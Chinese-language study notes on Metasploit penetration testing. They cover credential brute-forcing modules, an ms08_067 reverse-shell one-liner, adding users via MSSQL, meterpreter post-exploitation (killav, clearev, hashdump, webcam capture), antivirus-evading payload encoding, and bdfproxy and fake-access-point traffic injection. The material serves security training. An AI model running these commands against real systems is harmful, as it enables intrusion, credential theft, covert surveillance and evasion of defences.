发现目标存在的弱点

VNC密码破解

use auxiliary/scanner/vnc/vnc_login

标准VNC用5900那一串端口

自己找个好字典

VNC空密码登录尝试

use auxiliary/scanner/vnc/vnc_none_auth

RDP远程桌面漏洞检查

use auxiliary/scanner/rdp/ms12_020_check

设备后门

use auxiliary/scanner/ssh/juniper_backdoor
use auxiliary/scanner/ssh/fortinet_backdoor

虚拟化是资源按需分配必须的技术

VMWare ESXi 密码爆破

use auxiliary/scanner/vmware/vmauthd_login
use auxiliary/scanner/vmware/vmware_enum_vms

大同小异

web API 远程开启虚拟机

use auxiliary/admin/vmware/poweron_vm

需要帐号密码

http扫描 

过期证书扫描

use auxiliary/scanner/http/cert

显示目录  查找文件列表

use auxiliary/scanner/http/dir_listing

显示文件  爆破

use auxiliary/scanner/http/files_dir

应对随机目录的站点

WebDAV_Unicode 编码身份验证绕过

Tomat管理登录页面

use auxiliary/scanner/http/tomcat_mgr_login

基于HTTP方法身份验证绕过

Wordpress密码爆破

use auxiliary/scanner/http/wordpress_login_enum
set URI /wordpress/wp-login.php

WMAP WEB 应用扫描器

略微简陋的，只能检查具体的漏洞类型

是一个插件，根据sqlmap工作方式开发，调用msf里的大量模块来扫描

load wmap

大同小异

站点

wmap_sites -a http://1.1.1.1

目标

wmap_targets -t http://1.1.1.1/mutillidae/index.php

可以调用的模块

wmap_run -t

执行适用的扫描

wmap_run -e

查看发现的弱点

wmap_vulns -l

vulns

ftp扫描

大同小异，框架的好处，很有效率

版本扫描

匿名登录测试

mssql在TCP1433端口，还有个服务在UDP1434端口

连接TCP1433 或者尝试UDP1434 来探测mssql

use auxiliary/scanner/mssql/mssql_ping

爆破密码

use auxiliary/scanner/mssql/mssql_login

获得数据库密码的情况下，存储过程漏洞来远程执行代码

use auxiliary/admin/mssql/mssql_exec
set CMD net user user pass /ADD

目标补丁安装的信息

基于取得session来获取目标系统

use post/windows/gather/enum_patches

show advanced
set VERBOSE yes

检查失败的时候，迁移进程再试试

Known bug in WMI query, try migrating to another process

SSH版本扫描

use auxiliary/scanner/ssh/ssh_version

SSH密码爆破

use auxiliary/scanner/ssh/ssh_login

set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/
root_userpass.txt；set VERBOSE false ；run

USERPASS_FILE 就是每天payload都是一组帐号密码

SSH公钥登陆

使用公钥证书而不是密码登录

use auxiliary/scanner/ssh/ssh_login_pubkey
set KEY_FILE id_rsa；
set USERNAME root；
run

很多硬件的公钥证书是写死的

smb版本

use auxiliary/scanner/smb/smb_version

每个目标之间要加空格

扫描smb命名管道

判断服务类型

use auxiliary/scanner/smb/pipe_auditor

扫描smb可以访问的服务

use auxiliary/scanner/smb/pipe_dcerpc_auditor

用户枚举

use auxiliary/scanner/smb/smb_enumusers

共享枚举

use auxiliary/scanner/smb/smb_enumshares

SID枚举

SID创建帐号时根据操作系统主板的毫秒时钟的随机值生成额SID

use auxiliary/scanner/smb/smb_lookupsid

管理员 RID 500

guest 501

group 513

自己建的用户从1000开始往后排

01:12:30

密码嗅探

use auxiliary/sniffer/psnuffle

支持从pacap文件中提取密码，功能类似dnsniff，目前指支持pop3、imap、ftp、http get里的密码

snmp扫描

修改侦听的地址

vi /etc/default/snmpd

本质就是猜comminity

use auxiliary/scanner/snmp/snmp_login

配置枚举

use auxiliary/scanner/snmp/snmp_enum

枚举用户（windows）

use auxiliary/scanner/snmp/snmp_enumusers
（windows）

枚举共享（windows）

use auxiliary/scanner/snmp/snmp_enumshares
（windows）

nmap IPID ldle 扫描

use auxiliary/scanner/ip/ipidseq
set RHOSTS 192.168.1.0/24

run

多用search

用nmap扫描

nmap -PN -sI 1.1.1.2（僵尸机） 1.1.1.3（伪造的源地址，也就是目标的地址）

UDP扫描

use auxiliary/scanner/discovery/udp_sweep
use auxiliary/scanner/discovery/udp_probe

msfcli 2015年6月已经被取消，由msfconsole -x 取代，编辑脚本时便于引用

一条命令利用ms08067

msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set
RHOST 1.1.1.1; set PAYLOAD windows/meterpreter/
reverse_tcp; set LHOST 1.1.1.8; set LPORT 5555; set target 34;
exploit"

一个括号引起来，命令用分号分开

掉的不行的东西

meterpreter类型的shell

tab可以补命令，不能补文件名

backgroud 退回到msf下

pwd 显示shell的工作目录

cd 也能用 dir 也行 ls 也行 cat 也可以

mkdir 创建目录 rmdir 删除 mv 移动 rm 删除

edit 相当于vi

lpwd 本机（loacl）的工作目录

run/bgrun 运行/后台运行功能脚本（killav（关杀毒），定位，持久后门，webcam摄像头）

clearev清空日志

download 下载某某文件

upload 上传文件 某某目录（路径\得有两个斜杠\\，转义符）

execute -f 执行命令 -i 交互式 -H 把窗口隐藏起来

getuid 查看登录帐号 getsystem 获取system权限

getprivs 查看拥有的权限

getproxy 获得目标代理使用的代理

getpid 查看进程

migrate 改变迁移注入的进程

ps 查看运行的进程

hashdump 获取目标机器的帐号的hash值

sysinfo 获取系统信息 kill 杀进程

reboot shutdown

shell 获得一个操作系统的shell

show_mount 查看挂载的磁盘

search 搜索目标的文件 arp 查看当前的arp缓存 netstat 查看当前的连接状态

route 查看当前路由表 idletime 查看系统空闲时间，多长时间没有做操作了

resource 调用命令存成的资源文件

record_mic 录音 webcam_list 列出摄像头

webcam——snap -i 1 -v false 每一秒拍一张照片

python扩展

来自社区的贡献，无需运行环境，在客户端运行原生的python代码

load python

   Help 多出py的命令
   python_execute "print ('asdasdas')"
   python_execute "import os; cd =        os.getcwd()" -r cd
   python_import -f find.py #调用py文件，来执行

Meterpreter

实现类似nanocore的功能

高级动态可扩展，基于meterpreter上下文利用更多漏洞发起攻击，后渗透测试阶段一站式操作界面

完全基于内存的DLL注入式payload，不写硬盘，步骤 注入合法进程并建立stager，基于stager上传和预加载DLL进行扩展模块注入（客户端的API），基于stager建立的socket连接建立加密的TLS/1.0通信隧道

服务端用C语言编写，客户端提供基于ruby的全特性API

过滤坏字符

use payload/windows/shell_bind_tcp

generate 坏字符

 -b 过滤坏字符

  generate -b '\x00'
  generate -b '\x00\x44\x67\x66\xfa\x01\xe0\x44\x67\xa1\xa2\xa3\x75\x4b'
  generate -b '\x00\x44\x67\x66\xfa\x01\xe0\x44\x67\xa1\xa2\xa3\x75\x4b
\xFF\x0a\x0b\x01\xcc\6e\x1e\x2e\x26'

generate -b '\x00' -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/
share/windows-binaries/radmin.exe -f /root/1.exe

-t 制定输出什么格式

-e 加密方式

-k

-x 模板

手动指定编码模块

show encoders / generate -e x86/nonalpha

-s 跟加入nop的数量

shellcode很难跳过去，跳转不精确的时候，用nop来扩大跳转的命中范围

-t c 生成个c语言的，也可以是java或者别的什么

exploit模块

Active exploit 主动的，针对服务器本身的漏洞发起攻击

Passive exploit 被动的，针对客户端程序的漏洞，客户端程序访问存在漏洞利用代码的服务器，造成漏洞被利用

远程命令执行模块，需要帐号密码，目标没有开远程桌面，telnet

use exploit/windows/smb/psexec

图片加载漏洞

use exploit/windows/browser/ms07_017_ani_loadimage_chunksize

msf控制台命令

msfconsole中不区分大小写

模块之间数据调用，需要数据库

db_status 查看数据库连接状态

db_rebuild_cache 启动一个任务，创建一个模块的cache在数据库

db_disconnect 断开数据库连接

db_connect 制定配置文件，链接别的数据库

db_namp 集成在msfconsole下的nmap扫描器

      hosts 查看所有的存储的主机信息，跟具体地址则看具体一个的，-u 只看up的主机，-c 查制定列，多列的时候用都好分割，-S 关键字搜索

      services 显示端口跑的服务，-p 查看指定的端口

运行模块    run 或者 exploit

获取到的结果在数据库

creds 查看或得帐号密码信息

vulns 查看扫到的漏洞

loot 查看获得hash值

db_import

导入msf的备份

db_import /root/nmap.xml

也可以导入nmap

db_export

-f 指定导出的类型

导出

db_export -f xml /root/bak.xml

set 设置参数 unset 取消设置 setg 设置全局变量，所有的模块里都被设置

save 保存配置，下次进入的时候会读取保存的配置

jobs 当一个模块执行，会在后台生成一个job

exploit

-j 在后台执行，不加在前台执行

sessions 查看建立的会话，得到的shell

session -i 加session号，交互式进入shell

结合外部功能

load 指定插件，使用外部功能

unload 卸载插件

loadpath 调用指定目录的模块

route 根据session号指定流量流经session通过已经建立的连接传输流量

irb 开发接口，可以执行msf内部的函数

resource 调用一个资源文件，相当于msfconsole -r

把需要运行的命令存成一个xxx.rc文件

使用用户接口来使用msf功能

msfconsole接口

支持补全

msfconsole启动时

  -q 安静启动msf，不显示banner

  -v 版本信息

  -r 调用配置文件

msf控制台的命令

  banner 查看进入msf时的banner

color 颜色变化提醒特性，看一选择开 关 自动

  connect msfconsole下的nc，优势是支持SSL，UDP socket，代理

  show 加模块名来查看当前可用的模块，进入某个模块也能用

      show auxiliary / exploits / payloads / encoders / nops

  search 搜索

      关键词搜索：name:mysql（名称里带有mysql）、cve（编号）、type（按类型搜索）、author（按作者搜）、

进入模块后

info 查看模块详细信息

show evasion 查看混淆

show missing 查看遗漏的需设的参数

check 检查确认漏洞是否存在（有的模块有，大部分没有）

back 退回根目录

/usr/share/metasploit-framework/modules/

技术功能模块

exploits

    漏洞利用方法，利用系统漏洞进行攻击的动作。攻击的方法和流程

payload

    成功exploit之后，真正在系统执行的代码或指令

shellcode是payload的一种，由于其建立正向反向的shell而得名

三种payload

Single：all-in-one，完整功能，带运行环境

Stager：体积比较小，目标内存有限时，先传输一个较小的payload用于建立连接

stages：利用stager建立的连接下载的后续payload

两者都有多种类型，比较底层

auxiliary 辅助性功能，信息收集，枚举，指纹，扫描，也有DoS（没有payload的exploit，发送一些代码指令，获得信息）

encoders：对payload进行加密，AV检查的模块

nops：提高payload稳定性维持大小

使用postgresql数据库存储数据，工作在5432端口

Rex

基本功能库，用于完成日常基本任务，无需人工手动编码实现，处理socket连接，协议应答，编码转换

Nsf::Core

提供核心API，核心能力实现库

MSF::Base

 提供友好的API接口，便于调用的库

Plugin插件

连接和调用外部扩展功能和系统

msfdb

数据库相关

初始化数据库

msfdb init

集成PETS思想（标准渗透测试思想）

漏洞发现到利用，才能确定是存在漏洞

四个版本

两个社区版本：Framework（Command-line），Community（web界面）

两个商业版本 ：Express（三万多块钱），pro 版（二三十万）

pro版本 十四天试用

VPN Pivoting

Bdfproxy（mitmproxy）

基于流量劫持动态注入shellcode（ARP spoof，DNS spoof，Fake AP）

步骤

启动路由功能

    sysctl -w net.ipv4.ip_forward=1

    cat /proc/sys/net/ipv4/ip_forward

把对80 443的访问请求重定向到8080

    iptables -t nat -A PREROUTING -p tcp --dport 80/443 -j REDIRECT --to-
ports 8080

修改配置文件

vi /etc/bdfproxy/bdfproxy.cfg

修改工作方式，改成透明代理，默认是regular

proxyMode = transparent

设置好反弹的时候链接谁，有很多情况，因为事先是什么程序不知道

启动欺骗

arpspoof -i eth0 -t 欺骗谁 把我骗成谁

启动msf

用msfconsole调用bdfproxy生成的配置文件，来启动侦听

/usr/share/bdfproxy/xxxx.rc

手机欺骗

一加手机适合kali

Mana 创建 Fack AP

修改无线SSID名称

vi /etc/mana-toolkit/hostapd-mana.conf

  修改启动脚本

./usr/share/mana-toolkit/run-mana/start-nat-simple.sh

修改无线网卡适配并启动

流量重定向，两条规则

iptables -t nat -A PREROUTING -i $phy -p tcp --dport 80/443 -j REDIRECT --
to-port 8080

Bdfproxy 代理注入代码

msf侦听反弹shell

Msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc

补充内容

全站HttPS放注入（微软每个补丁都可能带马），现在已经是https了

数字签名可以被清除，并不是完全之策

全部用0覆盖

PE Header -> Optional Header -> Certificate Table(Address and size)